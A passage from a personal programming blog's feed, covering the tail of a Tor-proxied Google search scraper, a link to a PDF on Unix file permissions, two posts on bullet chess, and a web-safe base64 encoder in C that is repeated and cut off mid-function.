<span class="n">rdns</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span> <span class="c1"># rdns defaults to True. Never use rdns=False with Tor, otherwise hostnames are resolved locally and leak!</span>
<span class="n">socks</span><span class="o">.</span><span class="n">wrap_module</span><span class="p">(</span><span class="n">socket</span><span class="p">)</span>
<span class="n">socket</span><span class="o">.</span><span class="n">create_connection</span> <span class="o">=</span> <span class="n">create_connection</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">deep_scrape</span><span class="p">:</span>
<span class="n">results</span> <span class="o">=</span> <span class="n">deep_scrape</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">query</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">results</span> <span class="o">=</span> <span class="n">scrape</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">query</span><span class="p">,</span> <span class="n">args</span><span class="o">.</span><span class="n">num_results_per_page</span><span class="p">,</span> <span class="n">args</span><span class="o">.</span><span class="n">num_pages</span><span class="p">)</span>
<span class="k">for</span> <span class="n">result</span> <span class="ow">in</span> <span class="n">results</span><span class="p">:</span>
<span class="n">logger</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">'</span><span class="si">{}</span><span class="s1"> links found! The search with the keyword "</span><span class="si">{}</span><span class="s1">" yielded the result:</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span>
<span class="nb">len</span><span class="p">(</span><span class="n">result</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]),</span> <span class="n">result</span><span class="p">[</span><span class="s1">'search_keyword'</span><span class="p">],</span> <span class="n">result</span><span class="p">[</span><span class="s1">'num_results_for_kw'</span><span class="p">]))</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">view</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">webbrowser</span>
<span class="n">webbrowser</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">result</span><span class="p">[</span><span class="s1">'cache_file'</span><span class="p">])</span>
<span class="k">for</span> <span class="n">link_title</span><span class="p">,</span> <span class="n">link_snippet</span><span class="p">,</span> <span class="n">link_url</span> <span class="ow">in</span> <span class="n">result</span><span class="p">[</span><span class="s1">'results'</span><span class="p">]:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Link: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">unquote</span><span class="p">(</span><span class="n">link_url</span><span class="o">.</span><span class="n">geturl</span><span class="p">())))</span>
<span class="k">if</span> <span class="n">args</span><span class="o">.</span><span class="n">verbosity</span> <span class="o">></span> <span class="mi">1</span><span class="p">:</span>
<span class="kn">import</span> <span class="nn">textwrap</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Title: </span><span class="se">\n</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">indent</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">wrap</span><span class="p">(</span><span class="n">link_title</span><span class="p">,</span> <span class="mi">50</span><span class="p">)),</span> <span class="s1">'</span><span class="se">\t</span><span class="s1">'</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span>
<span class="s1">'Description: </span><span class="se">\n</span><span class="si">{}</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">indent</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">'</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">textwrap</span><span class="o">.</span><span class="n">wrap</span><span class="p">(</span><span class="n">link_snippet</span><span class="p">,</span> <span class="mi">70</span><span class="p">)),</span> <span class="s1">'</span><span class="se">\t</span><span class="s1">'</span><span class="p">)))</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'*'</span> <span class="o">*</span> <span class="mi">70</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'*'</span> <span class="o">*</span> <span class="mi">70</span><span class="p">)</span>
</code></pre></div>
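<p>The <code>--proxy</code> handling in the listing unpacks <code>args.proxy.split(':')</code> directly, which fails with a rather unhelpful unpacking error when the port is missing. A minimal sketch of a stricter parser follows. The helper name <code>parse_proxy</code> and the fallback port 9050 (taken from the example in the help text) are assumptions for illustration and not part of GoogleScraper:</p>

```python
def parse_proxy(spec, default_port=9050):
    """Split a 'host:port' string into (host, port).

    Hypothetical helper for illustration; not part of GoogleScraper.
    """
    # rpartition splits on the LAST colon, so the port is always the tail.
    host, sep, port = spec.rpartition(':')
    if not sep:
        # No colon at all: treat the whole string as the host name.
        return spec, default_port
    if not host:
        raise ValueError('missing proxy host in {!r}'.format(spec))
    port_number = int(port)  # raises ValueError for an empty or non-numeric port
    if not 0 < port_number < 65536:
        raise ValueError('proxy port out of range in {!r}'.format(spec))
    return host, port_number


if __name__ == '__main__':
    print(parse_proxy('127.0.0.1:9050'))
    print(parse_proxy('localhost'))
```

<p>The resulting tuple could then be passed to <code>socks.setdefaultproxy</code> in place of the raw <code>split(':')</code> result.</p>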
</td></tr></table>Linux/Unix privileges from a blackhats perspective2012-12-30T23:18:00+01:002012-12-30T23:18:00+01:00Nikolai Tschachertag:incolumitas.com,2012-12-30:/2012/12/30/linuxunix-privileges-from-a-blackhats-perspective/<p>Hey folks!</p>
<p>I had some difficulties understanding UNIX file permissions in all their
variations and their eternal tendency to be misused by admins! So I made a
little PDF; the standalone blog article will follow soon. It's just a
pain in the ass to convert all that LibreOffice formatting into a nice WordPress
format. Next time, I will just do it in plain 7-bit ASCII style,
goddamnit...</p>
<p>Hell, it's time to read some Phrack stuff again :)</p>
<p><strong>Download PDF here:</strong> <a href="/uploads/2012/12/blackhats_view.pdf">blackhats_view</a></p>Bullet chess challenge :)2012-11-26T15:01:00+01:002012-11-26T15:01:00+01:00Nikolai Tschachertag:incolumitas.com,2012-11-26:/2012/11/26/bullet-chess-challange/<p>I realised once more, that, when I excessively play bullet chess, I tend
to stagnate or my performance even goes down the tubes. The reason
behind this, I assume, is the absence of a defined goal, playing
without thinking (as far as thinking is the right word in bullet chess),
or other bad habits such as listening to music...</p>
<p>Therefore, I will try a little experiment: I will play no more
than 10 bullet games per day. This is around 20 minutes of playing. But every
time I lose, I have to do 6 full and slow chin-ups. I'll play on
chess.com and my starting rating is right now <strong>1924</strong>, which actually
is pretty high for me. Nevertheless, my goal is to reach Elo 2050. My
all-time high score is <strong>1974. </strong>Let's go and break some records...</p>
<p>Ok let the journey begin :)</p>
<ul>
<li>26.11.2012: <strong>1924 - 1896. </strong>Did around 30 chin-ups. Tired as hell.
Lost too many times :)</li>
<li>28.11.2012 <strong>1896 - 1903. </strong>Back in the 1900s. Did lots of
chin-ups. My game improved slightly; I think more and deeper. My speed is
still too slow...</li>
<li>29.11.2012 <strong>1903 - 1900. </strong>I am stagnating. I have the impression
that I still lack creativity and don't really want to play. My
motivation is weak, but I am way more concentrated compared to
playing endlessly long sessions. I lost 4 of 10 games. That
means 24 chin-ups :)</li>
<li>30.11.2012 <strong>1900 - 1888</strong>. What the fuck? I play excellently but
freaking slowly :/</li>
<li>1.12.2012 <strong>1888 - 1926</strong>. It goes up and up :)</li>
<li>2.12.2012 <strong>1926 - 1945. </strong>Seems like I am back in the solid 1900s.
This rating is close to my all-time high and I am looking forward to
setting a new record and fulfilling my goal!</li>
<li>3.12.2012 <strong>1945 - 1865</strong>. Played like 50 games. That's the
punishment. There was this one opponent who really made me angry. Next
time, I'll stick to the plan and won't get emotional. I shouldn't
play more than 10 games. Waaaaah!</li>
<li>4.12.2012 <strong>1865 - 1909. </strong>Fought my way brutally back into the 1900s
with 2 wins against a 2200 Elo player. Played my 10 games...</li>
<li>8.12.2012 <strong>1797 - 1825 </strong>Don't ask. At least I played 10
games today. 5 wins, 5 losses. Now I do <code>5 * 10</code> push-ups...</li>
<li>10.12.2012 <strong>1800 - 1847</strong></li>
<li>16.12.2012 <strong>1847 - 1823 </strong>Played 10 games...</li>
<li>18.12.2012 <strong>1800 - 2000 </strong>Hell yeah, I played at least 300 games
over the last few days and I finally achieved the freakin' 2000 Elo. To be
honest, if I really tried I could crack my original goal of Elo 2050,
but it's just way too risky that I suddenly drift off, lose my
concentration, and it begins all over. So I am stopping here. It's a
new all-time record since I started playing bullet chess (approximately 5
years ago) and it's good like that. It's just too much time wasted ;)</li>
</ul>
<p>The (incomplete) message I received on chess.com when I reached
2000:</p>
<p>...</p>
<p><em>Congratulations </em><em>zardaxt</em><em> on achieving a high rating on Chess.com!
You are now among the strongest players on our site.</em></p>
<p>...</p>
<p>The challenge ends with that...</p>Bullet Chess - A silly game?2012-11-05T20:37:00+01:002012-11-05T20:37:00+01:00Nikolai Tschachertag:incolumitas.com,2012-11-05:/2012/11/05/bullet-chess-a-silly-game/<p>I define bullet chess as games with one minute time for each
player. There are plenty of other definitions, but I think mine
is the most common one. This article is definitely
worth a read and helps to understand my further
deliberations: <a href="http://en.wikipedia.org/wiki/Fast_chess">http://en.wikipedia.org/wiki/Fast_chess</a></p>
<p>Well, besides my enthusiasm for IT security, I have always been a bullet
chess player, with what I find worryingly addictive traits. It all began
around three or four years ago, when I realised that simply too many
people tend to use chess engines on online platforms and, in addition, I
was just too nervous and unwilling to calculate and think for the
(somewhat boringly long) duration of an entire chess game. Bullet games were
perfect in this regard: It is almost impossible to cheat manually in
bullet games (of course you could write bots which directly interact
with the server through the underlying protocol - HTTP when you're
lucky, or some really badass proprietary one when you're unlucky,
but I assume that's a rather low percentage). It turns out that
my renunciation of the original purpose of chess, thinking deeply and
being patient, turned me into a slightly better player at long time controls,
but what is more important: It let me keep my fascination for this
highly complex and interesting game. Nevertheless, the increase in
tension and fun also comes at a high price, as I mentioned before: Addictive
elements ;)</p>
<p>More than once I played a whole night, and I guess that I played more
than 10 000 games over the last years. I saw people online with an
astonishing 200 000 bullet games. Assuming this person was on this
platform for 10 years (which indeed is a very long time), this would be 55
bullet chess games per day! This adds up to (just a rough guess, supposing
a game lasts 90 seconds on average) 1 hour and 20 minutes spent on
chess every day for freakin' 10 years! This sounds crazy but may
not be unrealistic. Many times I played 80 games against a single player
without interruption. Just think about it: <code>80 * 90 seconds = 7200 seconds
= 2 hours</code> of chess without any pause!</p>
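<p>For anyone who wants to check the rough numbers above, here is a small sketch of the arithmetic. The 90 seconds per game is the same rough guess as in the text, and the function names are just made up for this example:</p>

```python
SECONDS_PER_GAME = 90  # rough average per bullet game, as guessed in the text


def games_per_day(total_games, years):
    """Average number of games per day, ignoring leap years."""
    return total_games / (years * 365)


def minutes_played(games, seconds_per_game=SECONDS_PER_GAME):
    """Total playing time in minutes for the given number of games."""
    return games * seconds_per_game / 60


if __name__ == '__main__':
    per_day = games_per_day(200000, 10)
    print('games per day: {:.1f}'.format(per_day))
    print('minutes per day: {:.0f}'.format(minutes_played(per_day)))
    print('hours for an 80 game session: {:.1f}'.format(minutes_played(80) / 60))
```

<p>This gives roughly 55 games and a bit more than 80 minutes per day, and exactly 2 hours for the 80 game session.</p>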
<p>This might not be very healthy, and there are lots of voices out
there which criticize the nature and even the raison d'être of bullet chess.
I'll list them and argue against them, which finally brings us to the
initial purpose of this blog post: Is bullet chess just a random, silly
game for players who suck at real chess?</p>
<h3>Prejudice 1. Bullet chess is all about luck and moving pieces randomly</h3>
<p>No, definitely not. While novice bullet chess players might judge it
this way, it changes rapidly as you improve. With 60 seconds on your
clock, there is plenty of time to mate your opponent. Of course the
general approach to attack and defense is different. Bringing your king
into a safe position is essential; you just don't have the time to
figure out whether you might be able to defend him. This reveals a very
important property of being successful (at least up to a certain
degree) in this kind of chess:<br>
Intuition and strategy over knowing and thinking! It is for example
way easier to play a position in which you don't have to care about
potential mate threats, even if it would be lost in a longer game
due to some disadvantage in material or piece placement. This
works as long as you have enough power to generate new mate threats, but
as soon as your opponent can stop your attack, he can just play very fast
towards piece exchanges and promote a pawn to a queen. If you run out
of threats and your opponent has three or four seconds left, this is
usually enough time to mate you.</p>
<p>And this brings us to the second fact: Better bullet chess players tend
to play stronger. This sounds stupid, but it isn't. Stronger isn't equal
to 'better' in bullet chess. Up to a certain rating (I'd say around
ELO 1650), playing faster means playing better in bullet chess terms.
But once you cross this border as you improve, the
trade-off between playing strong and playing fast shifts towards playing
strong. You might have 40 seconds
left after 30 moves, but your ELO 2100 opponent has an unstoppable mate
threat with 5 seconds remaining. Still owned...</p>
<p>Last but not least, you can disprove the above prejudice just like this:
On big online chess platforms, like chessbase, there is a wide range of
strength classes among bullet players. The ELO ratings of bullet players
who play often and are well trained are spread between roughly 1500 and 3000 (at
least on chessbase), just like those of the equivalent players who only play
'real chess games'. If bullet was all about luck, why is the range so
big and diverse? Just because they move at different speeds?
(Yeah, it's a rhetorical question.)</p>
<h3>Prejudice 2. Real chess players don't play bullet games</h3>
<p>There are even big official blitz championships, and a lot of
grandmasters play blitz and bullet games for fun and sometimes seriously.
It will never replace the original chess, but it has its own
valid place.</p>
<h3>Prejudice 3. Mouse and high latency times make 'fair' games impossible</h3>
<p>That's just nonsense. While the criticisms are partially true for some
poorly programmed web platforms, these arguments aren't valid for the
more sophisticated, non browser based chess platforms like chessbase,
where you're able to make premoves, have super low latency and
many other benefits. A normal mouse is perfectly fine and you don't need to
invest money in a special one. I never understood the guys claiming
that I won because I possibly have the better mouse.</p>
<p>Despite everything said, I still have to admit that there is some kind
of hardware/configuration hurdle between novice or even average bullet
players and the advanced ones: You have to figure out some tricks and
shenanigans which give you an advantage:</p>
<ul>
<li>Use premoves</li>
<li>When you're both really short on time (1 or 2 seconds before timeout)
and you still have a piece to sacrifice, do it while giving check! Just
make the most spatially inconvenient check possible, so that the opponent
is forced to move and 'think'. Usually he's moving some random pawns
really fast, and then he is forced to move his mouse the whole
way to the king, and, tadaaaa, you won on time!</li>
<li>Hands down: Bullet chess players are rude and emotional people,
mainly because it's such an enormously stressful game mentally. So, if
you win on time, don't feel sorry about it! It's part of the game
setup, and winning on time is like winning by checkmate.
You were just better.</li>
<li>Check as often as you can. It steals time from your opponent.</li>
<li>Internalize openings.</li>
</ul>
<h3>Prejudice 4. Bullet chess is a silly game ;)</h3>
<p>I guess after you played it the first time, you were mentally so broken
that you became angry and blamed the game instead of yourself. It's a
hell of a thrilling, stressful and somehow insane game. It needs sheer
unimaginable mental resources, and not everyone can handle that! It's a
dead tough game, not a silly one, not meant for ramblers :D</p>
<h3>Prejudice 5. Bullet chess is bad, because it makes you a worse chess player</h3>
<p>Bullet chess is often considered a game which ruins your normal chess
skills (as you can see in the Wikipedia article above, even world
famous chess players support this opinion), because it encourages you to
move quickly and not spend (too much) time on positional and general
thinking. Chess is by all means not a game designed to be played in a minute.
I would never say that. What I want to say instead is that we have to
carefully distinguish between the two games. They aren't the same. You
also don't say that indoor football is stupid and silly because it
misinterprets the rules of the well known football. They are two similar
games (both played with a ball, several players and on grass), but have
different approaches to tactics and strategy. And if you want to become
successful in bullet chess, you need to be dead focused, very
fast, and, most importantly in my opinion, you constantly need to have
an inner overview of the time!</p>
<p>Write me and I would love to play some games with you. Recently, I
prefer <a href="http://chess.com" title="chess.com">chess.com</a>, and if you dare to
challenge a 1930 ELO player (of course just on bullet ;) ), I'll wait
for you :)</p>Web safe Base64 Encode/Decode in C2012-10-29T11:21:00+01:002012-10-29T11:21:00+01:00Nikolai Tschachertag:incolumitas.com,2012-10-29:/2012/10/29/web-safe-base64-encodedecode-in-c/<p>A short while ago I needed to implement a little web safe base64
en/decoder and couldn't find a good, small example anywhere on the
internet, so I decided to write my own quick and dirty one. I hope this
little demonstration code helps somebody...</p>
<p>I used Pelles C Compiler to build this program, but I am optimistic that
it works on every common C Compiler, since it's quite close to the C11
standard.</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include &lt;stdio.h&gt;</span>
<span class="cp">#include &lt;stdlib.h&gt;</span>
<span class="cp">#include &lt;string.h&gt;</span>
<span class="cp">#include &lt;errno.h&gt;</span>
<span class="cp">#define MAX_B64_PADDING 0x2</span>
<span class="cp">#define B64_PAD_CHAR "="</span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Decode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="nf">GetIndexByChar</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">b64alphabet</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"</span><span class="p">;</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Usage: %s StringToEncode</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"String </span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s"> to: "</span><span class="w"> </span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">Base64Encode</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])));</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* Caller has to free the returned base64 encoded string ! */</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">encodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fillBytes</span><span class="p">,</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">base64StrLen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">a0</span><span class="p">,</span><span class="w"> </span><span class="n">a1</span><span class="p">,</span><span class="w"> </span><span class="n">a2</span><span class="p">,</span><span class="w"> </span><span class="n">a3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* 4 output chars per started 3 byte group, plus the terminating NUL */</span><span class="w"></span>
<span class="w"> </span><span class="n">base64StrLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">((</span><span class="n">inputLen</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">base64StrLen</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char …</span></code></pre></div><p>A short while ago I needed to implement a little web safe base64
en/decoder and couldn't find a good, small example anywhere on the
internet, so I decided to write my own quick and dirty one. I hope this
little demonstration code helps somebody...</p>
<p>I used Pelles C Compiler to build this program, but I am optimistic that
it works on every common C Compiler, since it's quite close to the C11
standard.</p>
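<p>For readers who have not met the web safe variant before: it uses <code>-</code> and <code>_</code> where standard base64 uses <code>+</code> and <code>/</code>. The following is a minimal sketch of the core step, separate from the program below; the names <code>b64url</code>, <code>encoded_size</code> and <code>encode_group</code> are made up for this illustration. It shows how three input bytes are split into four 6 bit indexes into the alphabet, and how large the output buffer has to be.</p>

```c
#include <stddef.h>

/* Web safe alphabet: '-' and '_' take the place of '+' and '/'. */
static const char b64url[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";

/* Buffer size for n input bytes: 4 chars per started 3 byte group, plus NUL. */
size_t encoded_size(size_t n)
{
    return 4 * ((n + 2) / 3) + 1;
}

/* Encode exactly three bytes into four alphabet characters (no padding). */
void encode_group(const unsigned char in[3], char out[4])
{
    out[0] = b64url[in[0] >> 2];                           /* top 6 bits of byte 0 */
    out[1] = b64url[((in[0] & 0x03) << 4) | (in[1] >> 4)]; /* 2 bits + 4 bits     */
    out[2] = b64url[((in[1] & 0x0F) << 2) | (in[2] >> 6)]; /* 4 bits + 2 bits     */
    out[3] = b64url[in[2] & 0x3F];                         /* low 6 bits of byte 2 */
}
```

<p>With this sketch, the bytes of <code>"Man"</code> encode to <code>TWFu</code>, and the bytes <code>0xFB 0xFF 0xFF</code> encode to <code>-___</code>, where standard base64 would give <code>+///</code>.</p>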
<div class="highlight"><pre><span></span><code><span class="cp">#include &lt;stdio.h&gt;</span>
<span class="cp">#include &lt;stdlib.h&gt;</span>
<span class="cp">#include &lt;string.h&gt;</span>
<span class="cp">#include &lt;errno.h&gt;</span>
<span class="cp">#define MAX_B64_PADDING 0x2</span>
<span class="cp">#define B64_PAD_CHAR "="</span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nf">Base64Decode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="nf">GetIndexByChar</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">);</span><span class="w"></span>
<span class="k">static</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">b64alphabet</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"</span><span class="p">;</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Usage: %s StringToEncode</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"String </span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s"> to: "</span><span class="w"> </span><span class="p">,</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">Base64Encode</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="w"> </span><span class="n">strlen</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">])));</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/* Caller has to free the returned base64 encoded string ! */</span><span class="w"></span>
<span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="nf">Base64Encode</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">input</span><span class="p">,</span><span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">inputLen</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">encodedBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fillBytes</span><span class="p">,</span><span class="w"> </span><span class="n">i</span><span class="p">,</span><span class="w"> </span><span class="n">k</span><span class="p">,</span><span class="w"> </span><span class="n">base64StrLen</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">a0</span><span class="p">,</span><span class="w"> </span><span class="n">a1</span><span class="p">,</span><span class="w"> </span><span class="n">a2</span><span class="p">,</span><span class="w"> </span><span class="n">a3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* 4 output chars per started 3 byte group, plus the terminating NUL */</span><span class="w"></span>
<span class="w"> </span><span class="n">base64StrLen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="p">((</span><span class="n">inputLen</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="mi">3</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">encodedBuf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">base64StrLen</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">encodedBuf</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"calloc() failed with error %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">errno</span><span class="p">);</span><span class="w"></span>
